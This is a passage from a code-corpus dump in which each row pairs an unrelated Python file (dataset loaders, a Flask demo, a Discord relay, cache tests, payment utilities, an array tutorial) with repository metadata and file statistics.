sets = [set(string_set.split(',')) for string_set in string_sets]
intersection = sorted(sets[0].intersection(sets[1]))
print ",".join(intersection)
if __name__ == '__main__':
main()
| 20.666667 | 93 | 0.654378 | 195 | 1,302 | 4.25641 | 0.487179 | 0.054217 | 0.046988 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040554 | 0.223502 | 1,302 | 62 | 94 | 21 | 0.780415 | 0.02381 | 0 | 0 | 0 | 0 | 0.064171 | 0.044563 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.066667 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
911891456d9e7cb41632224dd81128e9e0fa9e6b | 2,776 | py | Python | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def bomsoi(path):
"""Southern Oscillation Index Data
The Southern Oscillation Index (SOI) is the difference in barometric
pressure at sea level between Tahiti and Darwin. Annual SOI and
Australian rainfall data, for the years 1900-2001, are given.
Australia's annual mean rainfall is an area-weighted average of the
total annual precipitation at approximately 370 rainfall stations around
the country.
This data frame contains the following columns:
Year
a numeric vector
Jan
average January SOI values for each year
Feb
average February SOI values for each year
Mar
average March SOI values for each year
Apr
average April SOI values for each year
May
average May SOI values for each year
Jun
average June SOI values for each year
Jul
average July SOI values for each year
Aug
average August SOI values for each year
Sep
average September SOI values for each year
Oct
average October SOI values for each year
Nov
average November SOI values for each year
Dec
average December SOI values for each year
SOI
a numeric vector consisting of average annual SOI values
avrain
a numeric vector consisting of a weighted average annual rainfall at
a large number of Australian sites
NTrain
Northern Territory rain
northRain
north rain
seRain
southeast rain
eastRain
east rain
southRain
south rain
swRain
southwest rain
Australian Bureau of Meteorology web pages:
http://www.bom.gov.au/climate/change/rain02.txt and
http://www.bom.gov.au/climate/current/soihtm1.shtml
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `bomsoi.csv`.
Returns:
Tuple of np.ndarray `x_train` with 106 rows and 21 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'bomsoi.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/DAAG/bomsoi.csv'
maybe_download_and_extract(path, url,
save_file_name='bomsoi.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
| 22.942149 | 74 | 0.699207 | 390 | 2,776 | 4.905128 | 0.484615 | 0.06116 | 0.075274 | 0.100366 | 0.198641 | 0.023001 | 0 | 0 | 0 | 0 | 0 | 0.01013 | 0.253242 | 2,776 | 120 | 75 | 23.133333 | 0.912687 | 0.67255 | 0 | 0 | 0 | 0 | 0.09126 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.409091 | 0 | 0.5 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9118ae0e8ce4a6964c33407d1f9bb269a5f81229 | 948 | py | Python | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | import pyblish.api
import openpype.api
class ValidateBypassed(pyblish.api.InstancePlugin):
"""Validate all primitives build hierarchy from attribute when enabled.
The name of the attribute must exist on the prims and have the same name
as Build Hierarchy from Attribute's `Path Attribute` value on the Alembic
ROP node whenever Build Hierarchy from Attribute is enabled.
"""
order = openpype.api.ValidateContentsOrder - 0.1
families = ["*"]
hosts = ["houdini"]
label = "Validate ROP Bypass"
def process(self, instance):
invalid = self.get_invalid(instance)
if invalid:
rop = invalid[0]
raise RuntimeError(
"ROP node %s is set to bypass, publishing cannot continue.." %
rop.path()
)
@classmethod
def get_invalid(cls, instance):
rop = instance[0]
if rop.isBypassed():
return [rop]
| 27.085714 | 78 | 0.632911 | 111 | 948 | 5.387387 | 0.558559 | 0.070234 | 0.090301 | 0.135452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005926 | 0.287975 | 948 | 34 | 79 | 27.882353 | 0.88 | 0.292194 | 0 | 0 | 0 | 0 | 0.131376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9119b7e105152a68ddb6c7704cd3d58179e633e6 | 4,687 | py | Python | gavPrj/dataset_core.py | GavinK-ai/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | 1 | 2021-11-15T06:16:44.000Z | 2021-11-15T06:16:44.000Z | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | import os
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
#srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4')
#srcPaths = ('all_dataset/s1',
# 'all_dataset/s10',
# 'all_dataset/s11',
# 'all_dataset/s12',
# 'all_dataset/s13',
# 'all_dataset/s14',
# 'all_dataset/s15',
# 'all_dataset/s16',
# 'all_dataset/s17',
# 'all_dataset/s18',
# 'all_dataset/s19',
# 'all_dataset/s2',
# 'all_dataset/s20',
# 'all_dataset/s21',
# 'all_dataset/s22',
# 'all_dataset/s23',
# 'all_dataset/s24',
# 'all_dataset/s25',
# 'all_dataset/s26',
# 'all_dataset/s27',
# 'all_dataset/s28',
# 'all_dataset/s29',
# 'all_dataset/s3',
# 'all_dataset/s30',
# 'all_dataset/s31',
# 'all_dataset/s32',
# 'all_dataset/s33',
# 'all_dataset/s34',
# 'all_dataset/s35',
# 'all_dataset/s36',
# 'all_dataset/s37',
# 'all_dataset/s38',
# 'all_dataset/s39',
# 'all_dataset/s4',
# 'all_dataset/s40',
# 'all_dataset/s41',
# 'all_dataset/s42',
# 'all_dataset/s43',
# 'all_dataset/s44',
# 'all_dataset/s45',
# 'all_dataset/s46',
# 'all_dataset/s47',
# 'all_dataset/s48',
# 'all_dataset/s49',
# 'all_dataset/s5',
# 'all_dataset/s50',
# 'all_dataset/s51',
# 'all_dataset/s52',
# 'all_dataset/s53',
# 'all_dataset/s54',
# 'all_dataset/s55',
# 'all_dataset/s56',
# 'all_dataset/s57',
# 'all_dataset/s58',
# 'all_dataset/s59',
# 'all_dataset/s6',
# 'all_dataset/s60',
# 'all_dataset/s61',
# 'all_dataset/s62',
# 'all_dataset/s63',
# 'all_dataset/s7',
# 'all_dataset/s8',
# 'all_dataset/s9')
srcPaths = ('testdataset/t1','testdataset/t2')
datasetfilename = 'testdataset1.npz'
def create_dataset(datasetfilename, srcPaths, classNames):
imgList = []
labelList = []
labelNameList = []
for srcPath in srcPaths:
# append all files in srcPath dir into imgList and labelList
for fname in os.listdir(srcPath):
filePath = os.path.join(srcPath, fname)
img = cv.imread(filePath)
# spilt the last text in file name to save as label
fname_no_ext = os.path.splitext(fname)[0]
# label = fname_no_ext[-1]
label = fname_no_ext
imgList.append(img)
labelList.append(classNames[label])
labelNameList.append(label)
# convert to imgList to numpy
images = np.array(imgList, dtype='object')
labels = np.array(labelList, dtype='object')
labelnames = np.array(labelNameList)
# save converted images and labels into compressed numpy zip file
np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames)
return True
def displayImg():
# for fname in os.listdir(srcPath):
pass
if __name__ == '__main__':
# save a dataset in numpy compressed format
# datasetfilename = 'tiredataset.npz'
classNames = {'afiq':0, 'azureen':1, 'gavin':2, 'goke':3, 'inamul':4, 'jincheng':5, 'mahmuda':6, 'numan':7, 'saseendran':8}
if create_dataset(datasetfilename, srcPaths, classNames):
data = np.load(datasetfilename, allow_pickle=True)
imgList = data['images']
labelList = data['labels']
labelNameList = data['labelnames']
img = imgList[0]
label = labelList[0]
labelNameList = data['labelnames']
imgRGB = img[:, :, ::-1]
plt.imshow(imgRGB)
plt.title(label)
plt.show()
print(imgList.shape)
print(labelList.shape)
# imgList, labelList = create_dataset()
# img = imgList[0]
# label = labelList[0]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[1]
# label = labelList[1]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[3]
# label = labelList[3]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
| 26.331461 | 128 | 0.528056 | 486 | 4,687 | 4.923868 | 0.343621 | 0.263268 | 0.016715 | 0.02173 | 0.165483 | 0.127037 | 0.083577 | 0.083577 | 0.083577 | 0.083577 | 0 | 0.047299 | 0.332409 | 4,687 | 177 | 129 | 26.480226 | 0.717482 | 0.427992 | 0 | 0.047619 | 0 | 0 | 0.058687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.02381 | 0.095238 | 0 | 0.166667 | 0.047619 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9127b9612983c8643c1eb5911a7a12880ad76607 | 803 | py | Python | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, redirect, url_for, jsonify, request
app = Flask(__name__)
users = []
'''
Json api
请求form里面Json 返回Json
好处:
1.通信的格式统一,对语言的约束就小了
2.易于做成open api
3.客户端重度渲染
RESTful api
Dr. Fielding
url 用资源来组织的 名词
/GET /players 拿到所有玩家
/GET /player/id 访问id的玩家的数据
/PUT /players 全量更新
/PATCH /players 部分更新
/DELETE /player/id 删除一个玩家
/GET /player/id/level
'''
@app.route("/", methods=["GET"])
def index():
return'''<form method=post action='/add'>
<input type=text name=author>
<button>提交</button>
</form>
'''
@app.route("/add", methods=["POST"])
def add():
form = request.form
users.append(dict(author=form.get("author", "")))
return redirect(url_for(".index"))
@app.route("/json")
def json():
return jsonify(users)
app.run() | 16.387755 | 60 | 0.636364 | 107 | 803 | 4.719626 | 0.560748 | 0.047525 | 0.055446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004658 | 0.198007 | 803 | 49 | 61 | 16.387755 | 0.779503 | 0 | 0 | 0 | 0 | 0 | 0.268245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.052632 | 0.105263 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
912a168bff4536c4b4657348252f51f09a3dbc8c | 1,776 | py | Python | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 18 | 2016-08-06T17:31:59.000Z | 2021-12-24T13:08:02.000Z | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 29 | 2016-08-07T14:03:00.000Z | 2022-01-23T21:05:33.000Z | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 25 | 2016-08-08T12:56:02.000Z | 2022-02-09T07:17:51.000Z | import logging
from typing import Match, Any, Dict
import aiohttp
from discord import Message
from MoMMI import comm_event, command, MChannel, always_command
logger = logging.getLogger(__name__)
@comm_event("ss14")
async def ss14_nudge(channel: MChannel, message: Any, meta: str) -> None:
try:
config: Dict[str, Any] = channel.module_config(f"ss14.servers.{meta}")
except ValueError:
return
expect_password = config["password"]
if expect_password != message.get("password"):
return
if "type" not in message or "contents" not in message:
return
contents = message["contents"]
type = message["type"]
if type == "ooc":
final_message = f"\u200B**OOC**: `{contents['sender']}`: {contents['contents']}"
else:
return
await channel.send(final_message)
@always_command("ss14_relay", unsafe=True)
async def ss14_relay(channel: MChannel, match: Match, message: Message) -> None:
if not channel.internal_name:
return
content = message.content
content = content.strip()
if not content or content[0] == "\u200B":
return
server = None
config: Any
for config in channel.server_config("modules.ss14", []):
if config["discord_channel"] != channel.internal_name:
continue
server = config["server"]
if not server:
return
config = channel.module_config(f"ss14.servers.{server}")
password = config["password"]
url = config["api_url"] + "/ooc"
async with aiohttp.ClientSession() as session:
async with session.post(url, json={"password": password, "sender": message.author.name, "contents": content}) as resp:
r = await resp.text()
logger.error(f"{resp.status}")
| 27.75 | 126 | 0.649212 | 214 | 1,776 | 5.285047 | 0.35514 | 0.013263 | 0.02122 | 0.035367 | 0.054819 | 0.054819 | 0 | 0 | 0 | 0 | 0 | 0.015284 | 0.226351 | 1,776 | 63 | 127 | 28.190476 | 0.80786 | 0 | 0 | 0.148936 | 0 | 0 | 0.141329 | 0.037162 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.085106 | 0.106383 | 0 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
912c1f2c9b394208b14b4781f1f67d739e19f340 | 539 | py | Python | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | 4 | 2017-11-05T02:54:39.000Z | 2022-03-01T06:01:20.000Z | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | null | null | null | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | null | null | null | import sqlalchemy as sa
from ..core import db
class GroupMembership(db.Model):
__tablename__ = 'group_memberships'
__table_args__ = dict(
autoload=True,
extend_existing=True,
)
user = db.relationship('Account',
foreign_keys='GroupMembership.user_id',
backref=db.backref('groups', cascade="all, delete-orphan"),
)
group = db.relationship('Account',
foreign_keys='GroupMembership.group_id',
backref=db.backref('members', cascade="all, delete-orphan"),
)
| 22.458333 | 68 | 0.651206 | 57 | 539 | 5.894737 | 0.578947 | 0.083333 | 0.125 | 0.166667 | 0.279762 | 0.279762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226345 | 539 | 23 | 69 | 23.434783 | 0.805755 | 0 | 0 | 0 | 0 | 0 | 0.236059 | 0.087361 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
912dd1c1fee777c8a3a588b4ebb22c1cb4588df4 | 1,790 | py | Python | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | 1 | 2020-10-16T19:30:41.000Z | 2020-10-16T19:30:41.000Z | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | 15 | 2020-06-18T15:32:06.000Z | 2022-03-03T23:06:24.000Z | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | null | null | null | import pytest
from mock import patch
from data.cache import InMemoryDataModelCache, NoopDataModelCache, MemcachedModelCache
from data.cache.cache_key import CacheKey
class MockClient(object):
def __init__(self, server, **kwargs):
self.data = {}
def get(self, key, default=None):
return self.data.get(key, default)
def set(self, key, value, expire=None):
self.data[key] = value
@pytest.mark.parametrize("cache_type", [(NoopDataModelCache), (InMemoryDataModelCache),])
def test_caching(cache_type):
key = CacheKey("foo", "60m")
cache = cache_type()
# Perform two retrievals, and make sure both return.
assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
def test_memcache():
key = CacheKey("foo", "60m")
with patch("data.cache.impl.Client", MockClient):
cache = MemcachedModelCache(("127.0.0.1", "-1"))
assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
def test_memcache_should_cache():
key = CacheKey("foo", None)
def sc(value):
return value["a"] != 1234
with patch("data.cache.impl.Client", MockClient):
cache = MemcachedModelCache(("127.0.0.1", "-1"))
assert cache.retrieve(key, lambda: {"a": 1234}, should_cache=sc) == {"a": 1234}
# Ensure not cached since it was `1234`.
assert cache._get_client().get(key.key) is None
# Ensure cached.
assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
assert cache._get_client().get(key.key) is not None
assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
| 32.545455 | 89 | 0.634078 | 231 | 1,790 | 4.82684 | 0.272727 | 0.049327 | 0.119283 | 0.138117 | 0.463677 | 0.463677 | 0.463677 | 0.463677 | 0.408072 | 0.408072 | 0 | 0.057383 | 0.201676 | 1,790 | 54 | 90 | 33.148148 | 0.722883 | 0.058101 | 0 | 0.352941 | 0 | 0 | 0.06302 | 0.026159 | 0 | 0 | 0 | 0 | 0.264706 | 1 | 0.205882 | false | 0 | 0.117647 | 0.058824 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9134f2e89b9311a8b0265758c45e89d220be134a | 5,948 | py | Python | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | import datetime
from decimal import Decimal, ROUND_DOWN, ROUND_UP
import logging
import re
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.utils import formats
from django.utils.cache import patch_cache_control
from django.utils.dateformat import format as format_date
from django.utils.dateparse import parse_date
from django.utils.encoding import force_text
from django.utils.translation import gettext_lazy as _
from django.views.generic import TemplateView
from mtp_common.auth import api_client, urljoin
import requests
from requests.exceptions import Timeout
logger = logging.getLogger('mtp')
prisoner_number_re = re.compile(r'^[a-z]\d\d\d\d[a-z]{2}$', re.IGNORECASE)
def get_api_session():
return api_client.get_authenticated_api_session(
settings.SHARED_API_USERNAME,
settings.SHARED_API_PASSWORD,
)
def check_payment_service_available():
# service is deemed unavailable only if status is explicitly false, not if it cannot be determined
try:
response = requests.get(api_url('/service-availability/'), timeout=5)
gov_uk_status = response.json().get('gov_uk_pay', {})
return gov_uk_status.get('status', True), gov_uk_status.get('message_to_users')
except (Timeout, ValueError):
return True, None
def validate_prisoner_number(value):
if not prisoner_number_re.match(value):
raise ValidationError(_('Incorrect prisoner number format'), code='invalid')
class RejectCardNumberValidator(RegexValidator):
regex = r'\d{4}\s*\d{4}\s*\d{4}\s*\d{4}'
inverse_match = True
code = 'card_number'
message = _('Please do not enter your debit card number here')
def format_percentage(number, decimals=1, trim_zeros=True):
if not isinstance(number, Decimal):
number = Decimal(number)
percentage_text = ('{0:.%sf}' % decimals).format(number)
if decimals and trim_zeros and percentage_text.endswith('.' + ('0' * decimals)):
percentage_text = percentage_text[:-decimals - 1]
return percentage_text + '%'
def currency_format(amount, trim_empty_pence=False):
"""
Formats a number into currency format
@param amount: amount in pounds
@param trim_empty_pence: if True, strip off .00
"""
if not isinstance(amount, Decimal):
amount = unserialise_amount(amount)
text_amount = serialise_amount(amount)
if trim_empty_pence and text_amount.endswith('.00'):
text_amount = text_amount[:-3]
return '£' + text_amount
def currency_format_pence(amount, trim_empty_pence=False):
"""
Formats a number into currency format display pence only as #p
@param amount: amount in pounds
@param trim_empty_pence: if True, strip off .00
"""
if not isinstance(amount, Decimal):
amount = unserialise_amount(amount)
if amount.__abs__() < Decimal('1'):
return '%sp' % (amount * Decimal('100')).to_integral_value()
return currency_format(amount, trim_empty_pence=trim_empty_pence)
def clamp_amount(amount):
"""
Round the amount to integer pence,
rounding fractional pence up (away from zero) for any fractional pence value
that is greater than or equal to a tenth of a penny.
@param amount: Decimal amount to round
"""
tenths_of_pennies = (amount * Decimal('1000')).to_integral_value(rounding=ROUND_DOWN)
pounds = tenths_of_pennies / Decimal('1000')
return pounds.quantize(Decimal('1.00'), rounding=ROUND_UP)
def get_service_charge(amount, clamp=True):
if not isinstance(amount, Decimal):
amount = Decimal(amount)
percentage_charge = amount * settings.SERVICE_CHARGE_PERCENTAGE / Decimal('100')
service_charge = percentage_charge + settings.SERVICE_CHARGE_FIXED
if clamp:
return clamp_amount(service_charge)
return service_charge
def get_total_charge(amount, clamp=True):
if not isinstance(amount, Decimal):
amount = Decimal(amount)
charge = get_service_charge(amount, clamp=False)
result = amount + charge
if clamp:
return clamp_amount(result)
return result
def serialise_amount(amount):
return '{0:.2f}'.format(amount)
def unserialise_amount(amount_text):
amount_text = force_text(amount_text)
return Decimal(amount_text)
def serialise_date(date):
return format_date(date, 'Y-m-d')
def unserialise_date(date_text):
date_text = force_text(date_text)
date = parse_date(date_text)
if not date:
raise ValueError('Invalid date')
return date
def lenient_unserialise_date(date_text):
date_text = force_text(date_text)
date_formats = formats.get_format('DATE_INPUT_FORMATS')
for date_format in date_formats:
try:
return datetime.datetime.strptime(date_text, date_format).date()
except (ValueError, TypeError):
continue
raise ValueError('Invalid date')
def govuk_headers():
return {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % settings.GOVUK_PAY_AUTH_TOKEN
}
def govuk_url(path):
return urljoin(settings.GOVUK_PAY_URL, path)
def api_url(path):
return urljoin(settings.API_URL, path)
def site_url(path):
return urljoin(settings.SITE_URL, path)
def get_link_by_rel(data, rel):
if rel in data['_links']:
return data['_links'][rel]['href']
def make_response_cacheable(response):
"""
Allow response to be public and cached for an hour
"""
patch_cache_control(response, public=True, max_age=3600)
return response
class CacheableTemplateView(TemplateView):
"""
For simple pages whose content rarely changes so can be cached for an hour
"""
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
return make_response_cacheable(response)
| 30.659794 | 102 | 0.714526 | 791 | 5,948 | 5.166877 | 0.279393 | 0.024468 | 0.023978 | 0.020553 | 0.210179 | 0.158307 | 0.146562 | 0.146562 | 0.143871 | 0.143871 | 0 | 0.008482 | 0.18729 | 5,948 | 193 | 103 | 30.818653 | 0.836781 | 0.115669 | 0 | 0.130081 | 0 | 0.00813 | 0.07467 | 0.014352 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0.00813 | 0.138211 | 0.056911 | 0.552846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9136160d5624a0c97151f5a92ef4449fe0be2b28 | 1,951 | py | Python | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | import array as arr
a = arr.array('i', [ 1,2,3,4,5,6])
print(a)
# Accessing elements
print(a[2])
print(a[-2])
# BASIC ARRAY OPERATIONS
# Find length of array
print()
print('Length of array')
print(len(a))
# Adding elments to an array
# append() to add a single element at the end of an array
# extend() to add more than one element at the end of an array
# insert() to add an element at a specific position in an array
print()
# append
print('Append')
a.append(8)
print(a)
# extend
print()
print('Extend')
a.extend([9,8,6,5,4])
print(a)
# insert
print()
print('Insert')
a.insert(2,6) # first param is the index, second param is the value
print(a)
# Removing elements from an array
# pop() Remove an element and return it
# remove() Remove element with a specific value without returning it
print()
print(a)
# pop
print('pop')
print(a.pop()) # removes last element
print(a)
print(a.pop(2))
print(a)
print(a.pop(-1))
print(a)
# remove
print()
print('remove')
print(a.remove(8)) # doesn't return what it removes, it removed the first occurrence of '8'
print(a)
# Array Concatenation
print()
print('Array Concatenation')
b = arr.array('i', [1,2,3,4,5,6,7])
c = arr.array('i', [3,4,2,1,3,5,6,7,8])
d = arr.array('i')
d = b + c
print(d)
# Slicing an Array
print()
print('Slicing an Array') # This means fetching some particular values from an array
print(d)
print(d[0:5]) # Doesn't include the value on the right index
print(d[0:-2])
print(d[::-1]) # Reverse the array, this method is not preferred because it exauhsts the memory
# Looping through an Array
print()
print('Looping through an Array')
print('Using for')
for x in d:
print(x, end=' ')
print()
for x in d[0:-3]:
print(x, end=' ')
print()
print('Using while')
temp = 0
while temp < d[2]:
print(d[temp], end = ' ')
temp = temp + 1 # Can use temp+=1, it's the same thing
print()
print(a)
tem = 0
while tem < len(a):
print(a[tem], end=' ')
tem += 1
print()
| 18.759615 | 95 | 0.664787 | 357 | 1,951 | 3.633053 | 0.282913 | 0.078643 | 0.046261 | 0.01542 | 0.123362 | 0.060139 | 0.060139 | 0.02313 | 0.02313 | 0 | 0 | 0.030492 | 0.17632 | 1,951 | 103 | 96 | 18.941748 | 0.776602 | 0.441312 | 0 | 0.402985 | 0 | 0 | 0.121583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.014925 | 0.746269 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
913cf201ceaa3cdf5791ad85165d65f001d7078a | 1,896 | py | Python | dash_carbon_components/Column.py | Matheus-Rangel/dash-carbon-components | e3f4aa4a8d649e2740db32677040f2548ef5da48 | [
"Apache-2.0"
